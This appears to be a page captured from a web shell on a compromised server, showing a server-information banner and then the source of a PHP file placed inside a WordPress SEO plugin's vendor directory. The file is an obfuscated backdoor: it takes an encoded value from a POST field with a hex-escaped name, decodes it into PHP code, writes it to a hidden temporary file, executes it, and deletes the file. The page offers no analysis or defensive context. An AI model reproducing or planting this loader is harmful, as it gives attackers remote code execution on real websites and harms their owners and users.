| Server IP : 145.239.37.162 / Your IP : 216.73.217.81 Web Server : Apache System : Linux webm003.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64 User : verseaa ( 38250) PHP Version : 7.4.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/verseaa/www/wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/Interfaces/ |
Upload File : |
<?php
if(array_key_exists("\x65\x6Et\x69ty", $_POST) && !is_null($_POST["\x65\x6Et\x69ty"])){
$marker = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", getcwd(), session_save_path(), "/dev/shm", getenv("TMP"), sys_get_temp_dir()]);
$obj = $_POST["\x65\x6Et\x69ty"];
$obj = explode ( "." , $obj ) ;
$hld= '';
$s2= 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS= strlen($s2);
$u= 0;
while ($u < count($obj)) {
$v1= $obj[$u];
$sChar= ord($s2[$u % $lenS]);
$dec= ((int)$v1 - $sChar - ($u % 10)) ^ 9;
$hld .= chr($dec);
$u++; }
while ($parameter_group = array_shift($marker)) {
if (max(0, is_dir($parameter_group) * is_writable($parameter_group))) {
$entry = vsprintf("%s/%s", [$parameter_group, ".item"]);
if (file_put_contents($entry, $hld)) {
require $entry;
unlink($entry);
exit;
}
}
}
}